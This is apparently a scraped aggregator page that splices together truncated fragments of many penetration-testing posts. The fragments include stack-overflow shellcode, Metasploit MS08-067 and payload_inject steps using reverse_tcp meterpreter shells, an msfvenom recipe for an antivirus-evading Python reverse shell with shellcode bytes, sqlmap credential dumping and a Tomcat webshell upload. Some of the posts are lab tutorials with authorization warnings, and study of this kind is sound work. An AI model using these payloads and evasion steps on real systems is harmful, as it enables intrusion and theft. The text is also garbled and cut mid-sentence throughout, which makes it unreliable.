The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.First, you need to figure out what a stack overflow attack is, read morehttp://blog.csdn.net/cnctloveyu/article/details/4236212This article is very clear, but the specific example is not very accurate, a little bit wrong.Here is an example of a modified executable that I have verified.Shell.c1#include 2 3 CharShellcode[] =4 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 5 "\x89\xf3\x8d
*) thetheir_addr,sin_size)) ==-1) the { thePerror ("Accept"); +Exit1); - } the Showclientinf (their_addr);Bayi if(!Fork ()) { theprintf"recv\n"); the recvastring (NEW_FD); -printf"close-new_fd 1\n"); - Close (NEW_FD); theExit0); the } theprintf"close-new_fd 2\n"); the Close (NEW_FD); - } theprintf"close-sockfd\n"); the Close (SOCKFD); the}This core is the recvastring function we are concerned with, which contains an obvious stack overflow vulnerability. We lo
The methods involved in this article can only be tested on authorized machines.First, I suggest you check the usage of meterpreter on the Internet. Read this article to understand why msf is used for permission elevation (because msf has a meterpreter which is very powerful ^_^)Metasploit has two tools: msfpayload and msfencode. These tools not only generate exe-type backdoors, but also generate webshells of the web script type. By generating webshell
/multi/misc/java_rmi_server" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M02/8B/5A/wKiom1hKNYDgJ-DVAACbgOjOXCQ699.jpg "style=" float: none; "title=" 2.jpg "alt=" Wkiom1hknydgj-dvaacbgojoxcq699.jpg "/>1.6 Enter the command "show options" in the terminal to see the related items that need to be set, and "yes" to indicate the parameters that must be filled in.1.7 Enter the command "set RHOST
The Metasploit software in the BT5 penetration tool used today, bt5 is a well-known hacker tool that contains many hacking software and security evaluation tools, although it is a hacker software, but it is also a helper in Security Detection. It can help us detect many vulnerabilities, mainly depending on how you use them. Because it is a hacker software, we hope that you can obtain authorization from others before conducting security detection to av
Topological environment: 2 virtual machines, one Kali, another XP with ms08067 vulnerability or 2000 or 2003 machinesMsfconsole entering the MSF consoleEnter Search ms0-067Find the appropriate moduleUse EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI using the appropriate moduleSet PAYLOAD windows/meterpreter/reverse_tcp setting bounce ConnectionShow Options View setup optionsSet RHOST 192.168.80.XX setting up a remote hostSet Lhost 192.168.80.YY setting Local HostShow targets view attack target system type
-t users-- Columns--dump [12:39:56] [INFO] table " dvwa.users ' dumped to csv file root .sqlmap output www.dvssc.com dump dvwa users.csv View Users.csv, inside the password of the admin through MD5 encryption, Google will know the password is the admin.p150 SQL injection Instance AnalysisTo log in to Www.dvssc.com's SQL injection training interface, first set the security level to a minimum.When using union injection, if the number of columns is different from the actual table, the error is:su
Metasploit+python generate Kill-free EXE ever the Antivirus1 Generate a bounce MSF python script under Kali, with the following command:Msfvenom-p windows/meterpreter/reverse_tcp lport=443 lhost=192.1681. 102 One-f py-o /opt/bk.py2. Copy the bk.py to the WINDOW32 system and modify it as follows (the red callout here is to modify the added code, other unchanged)From ctypes Import * Import ctypesbuf=""buf+="\xbb\x7a\x62\x0a\x22\xdb\xc9\xd9\x74\x24\x
Cobalt strike Create a new listenerInject a new payload into the current session MSF exploit (handler) > Use Exploit/windows/local/payload_injectmsf exploit ( Payload_inject) > set payload windows/meterpreter/reverse_httpmsf Exploit (payload_inject) > set Disablepayloadhandler true msf Exploit (Payload_ Inject) > set lhost 192.168 . Span style= "COLOR: #800080" >229.143 msf exploit (payload_inject) > Span style= "COLOR: #0000ff" >set lport 1212 MSF exploit (payload_inject) > set S
or directory edit edit a file getlwd print local working directory GETWD print W Orking Directory LCD change local working directory lpwd Print Local working directory LS List files mkdir make directory pwd Print working directory RM Delete the SPE cified file rmdir Remove Directory search Search forfiles upload upload a file or directorystdapi:networking Commands===========================Command Description------- -----------ifconfig display interfaces ipconfig display interf
Basic commandsImport Scan ResultsDb_import/path/file. NessusView existing IP information in the databaseMSF > Db_hosts-c address,svcs,vulns (Note: VULNS is vulnerability vulnerability abbreviation)Displays a list of detailed vulnerabilitiesMSF > Db_vulnsThe first step:Connecting to a databaseMSF > Db_connect postgres:[email protected] Database ip/msf3Step Two:Load NessusStep Three:MSF > Nessus_connect nessus Account: Password @ip: port (default = 8834)MSF > LoadView Plugin HelpMSF > Nessus_helpA
return to Metasploit to see how much exp the XSS can take advantage of. (The first thing to understand is that the XSS Insert code page to keep active state, so consider the success rate) Here I use alert to do the demo.
After the Show options, enter the relevant parameters and run.
Then return to XP to see a pop-up window (after all, I still use to play the window, alas)
In fact, here can also use some browser-oriented hole for more in-dept
A command injection vulnerability is to have a web app execute a command that was not previously available, which could be an operating system command or a custom script program. In the "Metasploit Penetration Test Devil Training Camp" book, the author of the WordPress plug-in Zingiri the existence of a command injection vulnerability analysis, but the cause of the vulnerability of the explanation is not particularly clear. One, the vulnerability trig
Vulnerability version:
Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windo WS-Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows 7
Vulnerability Description:
The Bugtraq id:52354 CVE id:cve-2012-0152 Remote Desktop Protocol (RDP, remotely desktop Protocol) is a multi-channel (multi-channel) protocol that allows the user (client or "local computer" ) connected to a computer tha
Label:Service PostgreSQL Start[....] Starting PostgreSQL 9.1 database server:main[...] The PostgreSQL server failed to start. Please check the log output:2015-02-07 18:52:12 CST log:could not translate host name "localhost" and service "5432" to add Ress:name or service not known 2015-02-07 18:52:12 CST warning:could not create listen sockets for "localhost" 2015-02-07 18:52:12 CST Fatal:could Not the Create any TCP/IP sockets. [F failed!failed!/etc/hostsAdd "127.0.0.1 localhost"
Build penetration test environment
Kali attack aircraft
WinXP SP1 drone
Start Metasploit
Windows RPC-related vulnerabilities
Internal-provided vulnerability attacks
drone WinXP SP1 network configuration to view the NAT network segment of a virtual machine
Configure IP addresses for WinXP SP1 drone
Perform vulnerability Utilization
Post -exploit:meterpreter>
Drone's information
Process Situation
View 2008 Process migration to explorer.exe P
This paper describes in detail the Python method of remote call Metasploit, which has a good reference value for Python learning. The implementation methods are as follows:
(1) Installing the Python Msgpack class library, the data serialization standard in the MSF official documentation is the reference to Msgpack.
root@kali:~# apt-get Install python-setuptools
root@kali:~# Easy_install
(2) Create Createdb_sql.txt:
Create databa
The methods involved in this article can only be tested on authorized machines.First of all, I suggest that we check the usage of Meterpreter on the Internet. Read this article to understand why you should use MSF Laiti (because there is a meterpreter in MSF that is powerful ^_^)Metasploit owns both Msfpayload and Msfencode tools, both of which can generate an EXE-type backdoor, a Webshell that generates web script types, and then sets up the listener
Use the Tomcat console default password vulnerability, upload Trojan file, get target host Webshell.When the Tomcat console is installed, you need to modify the default management account in a timely manner and eliminate the weak password, and
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.